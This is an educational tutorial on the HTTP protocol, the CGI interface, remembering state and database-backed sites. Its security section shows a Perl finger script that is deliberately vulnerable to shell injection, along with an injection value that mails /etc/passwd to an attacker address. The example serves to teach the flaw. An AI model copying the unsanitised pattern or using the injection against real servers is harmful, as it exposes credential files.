
Server-side programming | HTTP protocol | CGI | Security  | Databases

Like most acronyms, Common Gateway Interface (CGI) says little about what it actually is. An interface with what? Where is this gateway? What kind of commonality are we talking about? To answer these questions, let's step back and look at the WWW as a whole.


Tim Berners-Lee, a physicist who worked at CERN, invented the Web in 1990, although the plan dates back to 1988. The idea was to enable the easy and quick exchange of multimedia data (text, images and sound) over the Internet. The WWW consisted of three main parts: HTML, URL and HTTP. HTML is the formatting language used to represent content on the Web. A URL is an address used to retrieve content in HTML format (or otherwise) from a web server. HTTP is the protocol that a web server understands and that allows clients to request documents from the server.

HTTP protocol.

HTTP works as follows: the client program establishes a TCP connection to the server (standard port number 80) and issues an HTTP request to it. The server processes this request and issues an HTTP response to the client.

The structure of the HTTP request.

An HTTP request consists of a request header and a request body, separated by an empty line. The body of the request may be missing. The request header consists of the main (first) request line and subsequent lines that refine the request made in the main line. The subsequent lines may also be missing. The request in the main line consists of three parts, separated by spaces:

1. Method (in other words, HTTP command):

  • GET - document request. The most commonly used method; in HTTP/0.9, it is said to have been the only one.
  • HEAD - request for the header of the document. It differs from GET in that only the response header with information about the document is issued. The document itself is not issued.
  • POST - this method is used to transfer data to CGI scripts. The data itself follows in the request body.
  • PUT - place the document on the server. Rarely used. A request with this method has a body in which the document itself is passed.

2. The resource is the path to a specific file on the server that the client wants to retrieve (or to place, for the PUT method). If the resource is simply a file to be read, the server must issue it in the response body for this request. If it is the path to a CGI script, the server runs the script and returns the result of its execution. Thanks to this unification of resources, the client hardly needs to care what the resource actually is on the server.

3. Protocol Version - the version of the HTTP protocol with which the client program works.

Thus, the simplest HTTP request might look like this:

GET / HTTP/1.0 - requests the root document from the root directory of the web server.

The lines after the main query string have the following format: Parameter: Value.

This is how the request parameters are set. They are optional: all lines after the main request line may be missing, in which case the server uses default values or values carried over from the previous request (when working in Keep-Alive mode).
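The request format described above can be illustrated with a short parser. This is only a sketch in Python (chosen for illustration; it is not part of the original text), and the function name parse_request_head is hypothetical. It assumes lines end with CR/LF and that the main line has exactly three space-separated parts.

```python
def parse_request_head(raw: str):
    """Split an HTTP request head into (method, resource, version, headers)."""
    lines = raw.split("\r\n")
    # Main line: method, resource and protocol version separated by spaces.
    method, resource, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line:  # an empty line ends the header
            break
        # Each further line has the form "Parameter: Value".
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, resource, version, headers


example = (
    "GET /index.html HTTP/1.0\r\n"
    "Host: www.myserver.com\r\n"
    "Connection: close\r\n"
    "\r\n"
)
print(parse_request_head(example))
```

Header names are lowercased here only to make lookups simple; a real server does considerably more validation.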

Let's list some of the most common parameters of an HTTP request:

  • Connection - can take the values Keep-Alive and close:
      • Keep-Alive means that after this document is issued, the connection to the server is not broken, and more requests can be issued. Most browsers work in Keep-Alive mode, as it allows them to download an HTML page and its images over one connection to the server. Once established, Keep-Alive mode persists until the first error or until a subsequent request explicitly specifies Connection: close.
      • close means that the connection is closed after the request is answered.
  • User-Agent - the value is the identification string of the browser, for example: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95; DigExt)
  • Accept - the list of content types supported by the browser, in order of preference, for example, for IE5: Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, */*
    The value of this parameter is used mainly by CGI scripts to generate a response adapted to this browser.
  • Referer - the URL from which the client came to this resource.
  • Host - the name of the host from which the resource is requested. Useful if the server hosts multiple virtual servers under the same IP address. In this case, the name of the virtual server is determined by this field.
  • Accept-Language - the supported language. Matters to a server that can produce the same document in different language versions.

The format of the HTTP response. 

The format of the response is very similar to the format of the request: it also has a header and a body separated by an empty line. The header also consists of a main line and parameter lines, but the format of the main line differs from that in the request header. The main line of the response consists of 3 fields separated by spaces:

  • Protocol version - similar to the corresponding request parameter.
  • Status code - a numeric code indicating whether the request succeeded. Code 200 means "all is normal" (OK).
  • Verbal description of the status - a textual explanation of the preceding code. For example, for 200 it is OK, for 500 it is Internal Server Error.

The most common parameters of the HTTP response are:

  • Connection - similar to the corresponding request parameter. If the server does not support Keep-Alive (some do not), then the Connection value in the response is always close.
  • Content-Type - contains the designation of the content type of the response. Depending on the Content-Type value, the browser treats the response as an HTML page, a GIF or JPEG image, a file to be saved to disk, or something else, and takes appropriate action. The Content-Type value plays the same role for the browser as the file extension does for Windows. Some types of content:
      • text/html - text in HTML format (web page);
      • text/plain - plain text (similar to "Notepad");
      • image/jpeg - picture in JPEG format;
      • image/gif - the same, in GIF format;
      • application/octet-stream - a stream of "octets" (i.e. just bytes) to write to disk.
  • Content-Length - the length of the response content in bytes.
  • Last-Modified - the date of the last modification of the document.
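To make the response format concrete, here is a minimal Python sketch that splits a raw response into its main line, its parameters and its body. The function name parse_response is hypothetical, and the sketch assumes CR/LF line endings and a well-formed response; it ignores everything a real client must handle, such as chunked bodies.

```python
def parse_response(raw: bytes):
    """Return (version, code, reason, headers, body) for a raw HTTP response."""
    # The header and the body are separated by an empty line.
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    # Main line: protocol version, status code, verbal description.
    version, code, reason = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # If Content-Length is present, the body is exactly that many bytes.
    length = headers.get("content-length")
    if length is not None:
        body = body[: int(length)]
    return version, int(code), reason, headers, body


raw_response = (
    b"HTTP/1.0 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Length: 13\r\n"
    b"\r\n"
    b"<p>Hello</p>\n"
)
print(parse_response(raw_response))
```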

The ability to send all types of information over the Internet was a revolution, but another possibility was soon discovered. If you can send any text over the Web, why not send text generated by a program instead of text taken from a ready-made file? This opens up a sea of possibilities. A simple example: you can use a program that displays the current time, so that the reader sees the correct time each time the page is viewed. A few bright minds at the National Center for Supercomputing Applications (NCSA), who were creating a web server, saw this opportunity, and soon CGI appeared.

CGI is a set of rules according to which programs on a server can send data to clients through a web server. The CGI specification was accompanied by changes to HTML and HTTP introducing a new feature known as forms.
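The current-time example mentioned above might look like the following when written as a CGI program. This is a hedged sketch in Python rather than a listing from the original text; the function name time_page is hypothetical, and the Content-Type header line followed by an empty line is the minimal header a CGI program hands to the server.

```python
import time


def time_page(now=None):
    """Return a complete CGI response: header, empty line, HTML body."""
    stamp = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(now))
    return (
        "Content-Type: text/html\r\n"
        "\r\n"
        f"<html><body><p>The current time is {stamp}.</p></body></html>\n"
    )


# A CGI program simply writes its response to standard output.
print(time_page(), end="")
```

Because the page is generated on every request, each reader sees the time at which the request was served.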

If CGI allows programs to send data to a client, forms extend that capability by allowing the client to send data to that CGI program. Common CGI applications include:

  • Dynamic HTML. Entire sites can be generated by a single CGI program.

  • Search engines that find documents with user-defined words.
  • Guestbooks and bulletin boards to which users can add their posts.
  • Order forms.
  • Questionnaires.
  • Retrieving information from a server-hosted database.

All of these applications can connect CGI to a database, which is what particularly interests us.

CGI Specification

So, what exactly is the "rule set" that allows a CGI program in, say, Batavia, Illinois, to exchange data with a web browser in Outer Mongolia? The official CGI specification, along with a wealth of other information about CGI, can be found on the NCSA server at http://hoohoo.ncsa.uiuc.edu/cgi/.

There are four ways that CGI transfers data between a CGI program and a Web server, and therefore a Web client:

  1. Environment variables.
  2. Command line.
  3. Standard input.
  4. Standard output.

Using these four methods, the server forwards all data transmitted by the client to the CGI program. The CGI program then does its magic trick and sends the output back to the server, which forwards it to the client.

This description is based on the Apache HTTP server. Apache is the most common web server, running on almost any platform, including Windows 9x and Windows NT. However, the description applies to all HTTP servers that support CGI. Some proprietary servers, such as those from Microsoft and Netscape, may have additional features or work somewhat differently. As the face of the Web continues to change at an incredible rate, standards are still evolving, and there will undoubtedly be changes in the future. However, CGI technology seems to be well established; the price of that stability is that other technologies, such as applets, have drawn attention away from it. All the CGI programs you write using this information will almost certainly be able to run for years to come on most web servers.

When a CGI program is invoked through a form, the most common interface, the browser passes a long string to the server, at the beginning of which is the path to the CGI program and its name. This is followed by additional data, called path information, which is passed to the CGI program through the environment variable PATH_INFO (Table 2-1). The path information is followed by a "?" and then the form data that is sent to the server using the HTTP GET method. This data is made available to the CGI program through the QUERY_STRING environment variable. Any data that the page sends using the HTTP POST method, which is used most often, is passed to the CGI program through standard input.

A typical string that a server can get from a browser is shown in Table 2-1. A program named formread in the cgi-bin directory is called by the server with the additional path information extra/information and the query data choice=help, apparently as part of the original URL. Finally, the data of the form itself (the text "CGI programming" in the "keywords" field) is sent through the HTTP POST method.

Table 2-1. Parts of the string passed by the browser to the server

http://www.myserver.com/cgi-bin/formread/extra/information?choice=help

  /cgi-bin/formread     - program name
  /extra/information    - path information
  choice=help           - query string
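The breakdown in Table 2-1 can be reproduced with a few lines of Python. This is only a sketch: the function name split_cgi_url is hypothetical, and the script path is passed in explicitly because only the server knows where the program name ends and the path information begins.

```python
from urllib.parse import urlsplit


def split_cgi_url(url: str, script_name: str):
    """Split a URL into the CGI variables SCRIPT_NAME, PATH_INFO and QUERY_STRING."""
    parts = urlsplit(url)
    if not parts.path.startswith(script_name):
        raise ValueError("URL does not point at the given script")
    return {
        "SCRIPT_NAME": script_name,
        # Everything after the program name, up to the "?".
        "PATH_INFO": parts.path[len(script_name):],
        # Everything after the "?".
        "QUERY_STRING": parts.query,
    }


url = "http://www.myserver.com/cgi-bin/formread/extra/information?choice=help"
print(split_cgi_url(url, "/cgi-bin/formread"))
```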

Environment variables

When the server executes a CGI program, it first passes some data to it in the form of environment variables. Seventeen variables are officially defined in the specification, but significantly more are used informally through the mechanism described below, called the HTTP_ mechanism. The CGI program has access to these variables in the same way as to any shell environment variables when run from the command line.

In a shell script, for example, the FOO environment variable can be accessed as $FOO; in Perl, as $ENV{'FOO'}; in C, as getenv("FOO"). Table 2-2 lists the variables that are always set by the server, even if only to null. In addition to these variables, the data sent by the client in the request header is assigned to variables of the form HTTP_FOO, where FOO is the name of the header. For example, most Web browsers include version information in a header named User-Agent. Your CGI program can get this data from the HTTP_USER_AGENT variable.
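The naming rule for request headers can be sketched as follows. The code is Python for illustration only, and both function names are hypothetical. It assumes the usual convention of upper-casing the header name and replacing hyphens with underscores; the content type and length of the request body are the exception, since they arrive in CONTENT_TYPE and CONTENT_LENGTH without the prefix.

```python
import os


def header_to_env_name(header: str) -> str:
    """Map a request header name to the environment variable carrying it."""
    return "HTTP_" + header.upper().replace("-", "_")


def request_header(header: str, environ=os.environ, default: str = "") -> str:
    """Look up a request header the way a CGI program would."""
    return environ.get(header_to_env_name(header), default)


print(header_to_env_name("User-Agent"))
```

Outside a web server the variable is normally unset, so request_header("User-Agent") simply returns the default.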

Table 2-2. CGI Environment Variables

Environment variable - Description

  • CONTENT_LENGTH - Length of the data transmitted by the POST or PUT methods, in bytes.
  • CONTENT_TYPE - The MIME type of the data attached by the POST or PUT methods.
  • GATEWAY_INTERFACE - The version number of the CGI specification supported by the server.
  • PATH_INFO - Additional path information transmitted by the client. For example, for the request http://www.myserver.com/test.cgi/this/is/a/path?field=green, the value of the PATH_INFO variable would be /this/is/a/path.
  • PATH_TRANSLATED - The same as PATH_INFO, but the server performs all possible translation, for example, expansion of names of the type "~account".
  • QUERY_STRING - All data following the "?" character in the URL. This is also the form data when the form's REQUEST_METHOD is GET.
  • REMOTE_ADDR - The IP address of the client making the request.
  • REMOTE_HOST - The host name of the client machine, if available.
  • REMOTE_IDENT - If the web server and client support identd identification, this is the user name of the account that makes the request.
  • REQUEST_METHOD - The method used by the client for the request. For the CGI programs we're going to build, it's usually going to be POST or GET.
  • SCRIPT_NAME - The path to the script to run, as specified by the client. It can be used when linking a URL to itself, and so that scripts that exist in different places can be executed differently depending on the location.
  • SERVER_NAME - The host name (or the IP address, if the name is not available) of the machine on which the web server is running.
  • SERVER_PORT - The port number used by the Web server.
  • SERVER_PROTOCOL - The protocol used by the client to communicate with the server. In our case, this protocol is almost always HTTP.
  • SERVER_SOFTWARE - Information about the version of the Web server that is running the CGI program.

Here's an example of a Perl CGI script that outputs all the environment variables set by the server, as well as all the inherited variables set by the shell that started the server.

Code Listing 2.1. Displays the values of environment variables.

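#!/usr/bin/perl -w

# Send the HTTP header, followed by the empty line that ends the header.
print "Content-Type: text/html\n\n";

print "<html><head><title>Environment variables</title></head><body>\n";
print "<p>Environment variables:</p>\n";

# Print every environment variable visible to the script.
foreach (keys %ENV) { print "$_: $ENV{$_}<br>\n" }

print "</body></html>\n";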

All of these variables can be used and even modified by your CGI program. However, these changes do not affect the Web server that is running the program.

Pass parameters to the server.

Command line. 

CGI allows you to pass arguments to a CGI program as command-line parameters. This is rarely used because its practical applications are few, and we will not dwell on it in detail. The bottom line is that if the environment variable QUERY_STRING does not contain the "=" character, then the CGI program will run with command-line parameters taken from QUERY_STRING. For example, http://www.myserver.com/cgi-bin/finger?root will launch finger root on www.myserver.com.

Command-line parameters are most commonly used with the HTML tag <ISINDEX>. The <ISINDEX> tag denotes a miniature form contained in a single tag. When the browser encounters the <ISINDEX> tag, it displays a field in which the user can enter the query text. When a request is made (the user presses Enter), the browser extracts the URL from the <ISINDEX> tag and accesses it, passing the request text as a command line.

The finger program above can be written so that, when called without arguments, it outputs an HTML page containing the <ISINDEX> tag. After the user enters a name, finger behaves as described above.
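The rule about the "=" character can be sketched in Python as follows. The function name query_to_argv is hypothetical, and the splitting of the query on "+" with percent-decoding of each word is an assumption based on how <ISINDEX> queries are conventionally encoded; the text above only states that the parameters are taken from QUERY_STRING.

```python
from urllib.parse import unquote


def query_to_argv(query_string: str):
    """Return the command-line arguments a server would derive from QUERY_STRING."""
    # A query containing "=" is form data, not a command line.
    if not query_string or "=" in query_string:
        return []
    # Assumption: words are separated by "+" and individually percent-decoded.
    return [unquote(word) for word in query_string.split("+")]


print(query_to_argv("root"))
print(query_to_argv("choice=help"))
```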

Standard input device. 

As mentioned above, if the client uses the HTTP PUT or POST method to transmit information, the length and MIME type of this data are placed in the variables CONTENT_LENGTH and CONTENT_TYPE, respectively. The transmitted data is sent to the standard input of the CGI program. An end-of-file marker may not be sent to the program, so it must take the value of the CONTENT_LENGTH variable and read exactly as many bytes as it specifies. This is the main method of passing data from forms, and in our examples we will use it almost exclusively.
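Reading exactly CONTENT_LENGTH bytes can be sketched as below. This is illustrative Python; read_request_body is a hypothetical name, and the example form body reuses the "keywords" field mentioned earlier. The stream parameter exists only so the function can be tried without a web server.

```python
import io
import os
import sys
from urllib.parse import parse_qs


def read_request_body(environ=os.environ, stream=None) -> bytes:
    """Read exactly CONTENT_LENGTH bytes of request data from standard input."""
    if stream is None:
        stream = sys.stdin.buffer
    try:
        length = int(environ.get("CONTENT_LENGTH") or 0)
    except ValueError:
        length = 0
    # Do not wait for end-of-file: the server may never send it.
    return stream.read(length) if length > 0 else b""


# Simulated POST data; the trailing bytes must not be read.
fake_stdin = io.BytesIO(b"keywords=CGI+programmingEXTRA")
body = read_request_body({"CONTENT_LENGTH": "24"}, fake_stdin)
print(parse_qs(body.decode("ascii")))
```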

There are numerous libraries for almost all languages that handle the routine tasks of setting up CGI programs, including determining which method (GET or POST) was used to transmit the data and, accordingly, parsing the QUERY_STRING environment variable or reading from standard input. These libraries then put the data into easily accessible variables. An extensive list of CGI resources for different languages is available at Yahoo at: http://www.yahoo.com/Computers_and_Internet/Internet/World_Wide_Web/CGI_Common_Gateway_Interface/

Standard output device. 

The data sent by the CGI program to standard output is read by the web server and sent to the client. If the script name begins with nph-, the data is sent directly to the client without intervention from the Web server. In this case, the CGI program must generate a correct HTTP header that the client will understand. Otherwise, the Web server generates the HTTP header for you.

Even if you do not use an nph script, the server needs to be given one directive that tells it about your output. This is usually the Content-Type HTTP header, but it can also be a Location header. The header must be followed by an empty line, that is, a line feed or a CR/LF combination.

The Content-Type header tells the server what type of data your CGI program is producing. If it is an HTML page, the line must be Content-Type: text/html. The Location header tells the server a different URL, or a path on the same server, to which the client should be directed. The header should look like this: Location: http://www.myserver.com/another/place/.

After the HTTP headers and the empty string, you can send the actual data that your program outputs - an HTML page, an image, text, or anything else. Among the CGI programs that ship with the Apache server are nph-test-cgi and test-cgi, which do a good job of showing the difference between headers in the nph and non-nph styles, respectively.
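The two kinds of output described in this section can be sketched as a pair of small Python helpers. The function names are hypothetical; the header lines themselves are the ones named in the text.

```python
def content_response(body: str, content_type: str = "text/html") -> str:
    """Build non-nph CGI output: a Content-Type header, an empty line, the data."""
    return f"Content-Type: {content_type}\r\n\r\n{body}"


def redirect_response(url: str) -> str:
    """Build CGI output that asks the server to send the client elsewhere."""
    return f"Location: {url}\r\n\r\n"


print(content_response("<html><body><p>Hello</p></body></html>\n"), end="")
```

In both cases the empty line is what tells the server where the header ends.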

Important features of CGI scripting. 

You already know basically how CGI works. The client sends the data, usually using a form, to the web server. The server executes the CGI program, passing data to it. The CGI program carries out its processing and returns its output data to the server, which transmits it to the client. Now, from understanding how a CGI program works, you need to move on to understanding why they are so widely used.

There are a few more important questions to be sorted out before you can create programs that actually work. First, you need to learn how to work with several forms. Then you need to master some security measures that will prevent intruders from gaining illegal access to your server's files or destroying them.

Remembering state

Remembering state is a vital means of providing good service to your users, not just a way to combat hardened criminals. The problem is caused by the fact that HTTP is a so-called "stateless" protocol. This means that the client sends data to the server, the server returns data to the client, and then each goes its own way. The server does not store data about the client that may be needed in subsequent operations. Similarly, there is no certainty that the client will save any data about the transaction that can be used later. This imposes a significant restriction on the use of the World Wide Web.

 

Writing CGI scripts with such a protocol is analogous to the inability to remember a conversation. Whenever you talk to someone, no matter how often you've interacted with them before, you have to introduce yourself and look for a common topic of conversation. Figure 3-1 shows that whenever a request reaches a CGI program, it is a completely new instance of the program that has no connection to the previous one.

On the client side, with the advent of Netscape Navigator, a seemingly hastily made solution called cookies appeared. It consists of a new HTTP header that can be sent back and forth between the client and the server, similar to the Content-Type and Location headers. The client browser, having received the cookie header, must save the data in the cookie, as well as the name of the domain in which this cookie is valid. After that, whenever the user visits a URL within the specified domain, the cookie header must be returned to the server for use in CGI programs on that server.

The cookie method is used primarily to store a user ID. You can save the visitor information in a file on the server. The unique ID of this user can be sent as a cookie to the user's browser, after which each time the user visits the site, the browser automatically sends this ID to the server. All this happens imperceptibly for the user.
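Storing a user ID in a cookie might be sketched like this in Python, using the standard http.cookies module. The cookie name user_id and both function names are hypothetical; in a CGI program the cookies sent by the browser arrive in the HTTP_COOKIE environment variable, following the HTTP_ naming rule described earlier.

```python
from http.cookies import SimpleCookie


def set_cookie_header(user_id: str) -> str:
    """Build the header line that asks the browser to remember the user ID."""
    cookie = SimpleCookie()
    cookie["user_id"] = user_id
    cookie["user_id"]["path"] = "/"
    return cookie.output()


def user_id_from_environ(environ):
    """Return the user ID the browser sent back, or None if there is none."""
    cookie = SimpleCookie(environ.get("HTTP_COOKIE", ""))
    morsel = cookie.get("user_id")
    return morsel.value if morsel is not None else None


print(set_cookie_header("abc123"))
print(user_id_from_environ({"HTTP_COOKIE": "user_id=abc123; theme=dark"}))
```

The ID would then serve as the key for the visitor's file on the server.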

Despite the usefulness of this method, most large sites do not use it as the only means of remembering the state. There are a number of reasons for this. First, not all browsers support cookies. Until recently, the main browser for people with low vision (not to mention people with insufficient network connection speeds) - Lynx - did not support cookies. "Officially" it still does not support them, although some of its widely available "side branches" do so. Secondly, and more importantly, cookies bind the user to a specific machine. One of the great advantages of the Web is that it is accessible from anywhere in the world. Regardless of where your web page was created or stored, it can be displayed from any Internet-connected machine. However, if you try to access a cookie-enabled site from someone else's machine, all of your personal data maintained by the cookie will be lost.

Many sites still use cookies to personalize user pages, but most complement them with a traditional "login/password" style interface. If the site is accessed from a browser that does not support cookies, the page contains a form in which the user enters the registration name and password assigned to him when he first visited the site. Usually this form is small and modest, so as not to scare off the majority of users who are not interested in any personalization, but simply want to go further. After the user enters the registration name and password into the form, CGI finds a file with data about this user, as if the name were sent with a cookie. Using this method, the user can register on a personalized website from anywhere in the world.

Besides tracking user preferences and storing information about users over the long term, there is a more subtle example of remembering state, provided by popular search engines. When you search using services like AltaVista or Yahoo, you typically get significantly more results than can be displayed in an easy-to-read view.

This problem is solved by showing a small number of results (typically 10 or 20) and providing a way to view the next group of results. Although this behavior seems normal and expected to the average Web traveler, its actual implementation is non-trivial and requires remembering state. When a user first makes a query to a search engine, it collects all the results, perhaps limited to some preset maximum.

The trick is to deliver these results a few at a time, while remembering which user requested them and which portion that user expects next. Leaving aside the complexities of the search engine itself, we face the problem of consistently providing the user with some information one page at a time.

However, if you need more than the ability to just flip through a file, then relying on a URL can be onerous. You can alleviate this difficulty by using an HTML form and including state data in the <INPUT> tags of the HIDDEN type.
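Carrying state in hidden form fields can be sketched as follows. This is illustrative Python; hidden_fields is a hypothetical name, and the field names in the example are made up. Values are HTML-escaped so that state containing quotes or angle brackets cannot break the form.

```python
from html import escape


def hidden_fields(state: dict) -> str:
    """Render each item of state as an <INPUT> tag of type HIDDEN."""
    return "\n".join(
        '<input type="hidden" name="{}" value="{}">'.format(
            escape(str(name), quote=True), escape(str(value), quote=True)
        )
        for name, value in state.items()
    )


print(hidden_fields({"user": "fred", "position": 20}))
```

The CGI program that receives the form gets these fields back along with the visible ones, which is how the state survives from one request to the next.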

This method is successfully used on many sites, allowing you to make links between interconnected CGI programs or expanding the possibilities of using a single CGI program. Instead of referencing a specific object, such as a start page, these URLs can point to an automatically generated user ID.

This is how AltaVista and other search engines work. At the first search, a user ID is generated, which is invisibly included in subsequent URLs. Associated with this ID are one or more files that contain the results of the query. Two more values are included in the URL: the current position in the results file and the direction in which you want to move further in it. These three values are all that is needed for the powerful navigation systems of large search engines to work.
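The three values described above (an ID, a position and a direction) are enough to page through stored results. The following Python sketch is hypothetical throughout: the parameter names id, pos and dir, the script path /cgi-bin/search and the page size of 10 are illustrative assumptions, not details of any real search engine.

```python
from urllib.parse import urlencode


def next_position(position: int, direction: str, total: int, page_size: int = 10) -> int:
    """Compute where the next page of results starts."""
    step = page_size if direction == "next" else -page_size
    candidate = position + step
    if candidate < 0 or candidate >= total:
        return position  # already on the first or last page
    return candidate


def page_url(search_id: str, position: int, direction: str) -> str:
    """Build a link that carries all three state values."""
    query = urlencode({"id": search_id, "pos": position, "dir": direction})
    return "/cgi-bin/search?" + query


print(page_url("abc", next_position(0, "next", 25), "next"))
```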

Security measures

When operating Internet servers, whether they are HTTP servers or otherwise, compliance with security measures is a paramount concern. The exchange of data between the client and the server, carried out within the framework of CGI, raises a number of important problems related to data protection. The CGI protocol itself is quite secure. A CGI program receives data from the server through a standard input device or environment variables, and both of these methods are secure. But once a CGI program takes control of the data, its actions are unlimited. A poorly written CGI program can allow an attacker to gain access to a server system. Consider the following example of a CGI program:

Code Listing 2.2. A valid CGI interface to the finger command.

#!/usr/bin/perl -w

use CGI;

my $output = new CGI;

my $username = $output->param('username');

print $output->header, $output->start_html('Finger Output'), "<pre>", `finger $username`, "</pre>", $output->end_html;

If you run the program simply as finger.cgi, it will display a list of all current users on the server. If you run it as finger.cgi?username=fred, it will display information about the user "fred" on the server. You can even run it as finger.cgi?username=bob@foo.com to display information about a remote user. However, if you run it as finger.cgi?username=fred;mail hacker@bar.com</etc/passwd, unwanted things can happen. The backtick operator (``) in Perl spawns a shell process and executes a command, returning its output. In this program, `finger $username` is used as an easy way to execute the finger command and get its result. However, most shells allow you to combine multiple commands on a single line. For example, any shell like the Bourne shell does so using the ";" character.

Therefore, 'finger fred;mail hacker@bar.com</etc/passwd' will first run the finger command and then the mail hacker@bar.com</etc/passwd command, which can send the entire server password file to the unwanted user.

One solution is to parse the data from the form in order to find malicious content. You can, say, search for the ";" character and remove it along with any characters that follow it. Such an attack can also be made impossible altogether by using alternative methods.
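One such alternative, sketched here in Python rather than Perl, is to combine both defenses: accept only user names made of a small set of expected characters, and run the command without a shell so that ";" and "<" have no special meaning. The function names, the allowed character set and the length limit are assumptions chosen for illustration.

```python
import re
import subprocess

# Assumption: letters, digits and a few punctuation marks cover "fred"
# and "bob@foo.com"; everything else is rejected.
_SAFE_NAME = re.compile(r"[A-Za-z0-9_.@-]{1,64}")


def is_safe_username(username: str) -> bool:
    """Accept only names that cannot be mistaken for shell syntax or options."""
    return bool(_SAFE_NAME.fullmatch(username)) and not username.startswith("-")


def finger(username: str) -> str:
    """Run finger on a validated user name without involving a shell."""
    if not is_safe_username(username):
        raise ValueError("unsafe username")
    # Passing a list means the name is a single argument, never shell code.
    result = subprocess.run(
        ["finger", username], capture_output=True, text=True, check=False
    )
    return result.stdout


print(is_safe_username("fred;mail hacker@bar.com</etc/passwd"))
```

Allowing known-good characters is generally more robust than searching for known-bad ones, because there is no list of dangerous characters to keep complete.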

Another important security consideration is related to user rights. By default, the Web server runs the CGI program as the user who started the server itself. Usually it is a pseudo-user, such as "nobody", who has limited rights, so the CGI program also has few rights. This is usually a good thing, because if an attacker can access the server through a CGI program, he will not be able to cause much harm. An example of a program stealing passwords shows what can be done, but the actual damage to the system is usually limited.

However, working as a limited user also limits the capabilities of CGI. If a CGI program needs to read or write files, it can only do so where it has that permission. A CGI program must have read and write permission to the desired directory, not to mention the files themselves. You can do this by creating a directory as the same user as the server, with read/write permissions for that user only. However, for a user like "nobody", only root has this capability. If you are not a superuser, you will have to communicate with the system administrator every time the CGI changes.

Another way is to make the directory world-readable and world-writable, effectively removing all protection from it. Since these files can only be accessed from the outside world through your program, the danger is not as great as it may seem. However, if a hole is found in the program, a remote user will have full access to all the files, including the ability to destroy them. In addition, legitimate users working on the server will also be able to modify these files. If you are going to use this method, all users of the server must be trustworthy. Also, use an open directory only for files that are required by the CGI program; in other words, don't put unnecessary files at risk.

What else can you read.

"CGI Programming on the World Wide Web" from O'Reilly and Associates covers material from simple scripts in different languages to really amazing tips and tricks. Freely available information is also abundant on the WWW. It's a good idea to start with CGI Made Really Easy at CGI Easy.

CGI and Databases

Since the beginning of the Internet era, databases have been intertwined with the development of the World Wide Web. In practice, many view the Web simply as one giant database of multimedia information.

Search engines provide an everyday example of the benefits of databases. A search engine doesn't roam the whole Internet looking for keywords the moment you query them. Instead, the site's developers use other programs to build a giant index that serves as a database from which the search engine retrieves records. Databases store information in a form that allows fast random-access retrieval.

Because of their flexibility, databases give the Web even more power: they turn it into a potential interface for anything. For example, system administration can be performed remotely through a web interface instead of requiring an administrator to log in to the desired system. Connecting databases to the Web is at the heart of a new level of interactivity on the Internet.

One reason for connecting databases to the Web comes up again and again: a significant part of the world's information is already in databases. Databases that existed before the advent of the Web are called legacy databases (as opposed to non-Web-connected databases created recently, which should be called a "bad idea"). Many corporations (and even individuals) are now faced with the task of providing access to these legacy databases via the Web.

As stated above, only your imagination limits the possibilities of connecting databases and the Web. Currently, there are thousands of unique and useful databases that can be accessed from the Web. The types of databases behind these applications vary widely. Some of them use CGI programs as an interface to a database server such as MySQL, or use commercial applications to interact with popular desktop databases such as Microsoft Access. Others simply work with flat text files, which are the simplest databases of all.

With these three types of databases, you can develop useful websites of any size and complexity.